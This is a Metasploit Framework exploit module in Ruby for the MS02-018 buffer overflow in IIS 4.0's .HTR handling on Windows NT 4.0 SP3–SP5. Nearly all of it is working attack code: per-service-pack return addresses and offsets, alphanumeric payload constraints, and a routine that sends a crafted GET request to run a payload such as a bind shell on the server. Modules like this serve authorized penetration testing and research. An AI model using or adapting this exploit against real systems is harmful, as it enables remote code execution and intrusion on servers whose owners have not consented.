GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/windows/iis/ms02_018_htr.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
  Rank = GoodRanking

  include Msf::Exploit::Remote::Tcp

  # Registers module metadata (name, references, payload constraints, per-SP
  # return addresses) and the single RPORT option (default 80).
  #
  # @param info [Hash] metadata supplied by the framework, merged via update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'MS02-018 Microsoft IIS 4.0 .HTR Path Overflow',
        'Description' => %q{
          This exploits a buffer overflow in the ISAPI ISM.DLL used to
          process HTR scripting in IIS 4.0. This module works against
          Windows NT 4 Service Packs 3, 4, and 5. The server will
          continue to process requests until the payload being
          executed has exited. If you've set EXITFUNC to 'seh', the
          server will continue processing requests, but you will have
          trouble terminating a bind shell. If you set EXITFUNC to
          thread, the server will crash upon exit of the bind shell.
          The payload is alpha-numerically encoded without a NOP sled
          because otherwise the data gets mangled by the filters.
        },
        'Author' => ['stinko'],
        'License' => BSD_LICENSE,
        'References' => [
          ['CVE', '1999-0874'],
          ['OSVDB', '3325'],
          ['BID', '307'],
          ['URL', 'http://www.eeye.com/html/research/advisories/AD19990608.html'],
          ['MSB', 'MS02-018']
        ],
        'Privileged' => true,
        'Payload' => {
          'Space' => 2048,
          # Only alphanumeric bytes survive the .htr path filters (see Description),
          # so everything outside that charset is declared bad.
          'BadChars' => Rex::Text.charset_exclude(Rex::Text::AlphaNumeric),
          'StackAdjustment' => -3500
        },
        'Platform' => 'win',
        # 'Rets' => [offset to the saved return address, address used as the return]
        'Targets' => [
          ['Windows NT 4.0 SP3', { 'Platform' => 'win', 'Rets' => [593, 0x77f81a4d] }],
          ['Windows NT 4.0 SP4', { 'Platform' => 'win', 'Rets' => [593, 0x77f7635d] }],
          ['Windows NT 4.0 SP5', { 'Platform' => 'win', 'Rets' => [589, 0x77f76385] }]
        ],
        # The pure-alphanumeric GetEIP stub relies on SEH, so it must be allowed.
        'DefaultOptions' => { 'AllowWin32SEH' => true },
        'DisclosureDate' => '2002-04-10',
        'DefaultTarget' => 0,
        # Left UNKNOWN by the author; note that the Description already documents
        # a service crash when EXITFUNC is 'thread'.
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options([Opt::RPORT(80)])
  end

  # Opens the TCP connection, sends one crafted GET request whose path ends in
  # ".htr", starts the payload handler and closes the connection.
  def exploit
    connect

    ret_offset, ret_addr = target['Rets']
    request = htr_request(ret_offset, ret_addr)

    print_status(format('Trying target %s with jmp eax at 0x%.8x...', target.name, ret_addr))
    sock.put(request)

    handler
    disconnect
  end

  private

  # Builds the HTTP/1.0 request line: filler up to the saved return address,
  # the little-endian return address, then the encoded payload, used as the
  # path of a ".htr" resource.
  #
  # @param ret_offset [Integer] number of filler bytes before the return address
  # @param ret_addr [Integer] return address for the selected target
  # @return [String] the complete request, terminated by an empty line
  def htr_request(ret_offset, ret_addr)
    path = ('X' * ret_offset) + [ret_addr].pack('V') + payload.encoded
    "GET /#{path}.htr HTTP/1.0\r\n\r\n"
  end
end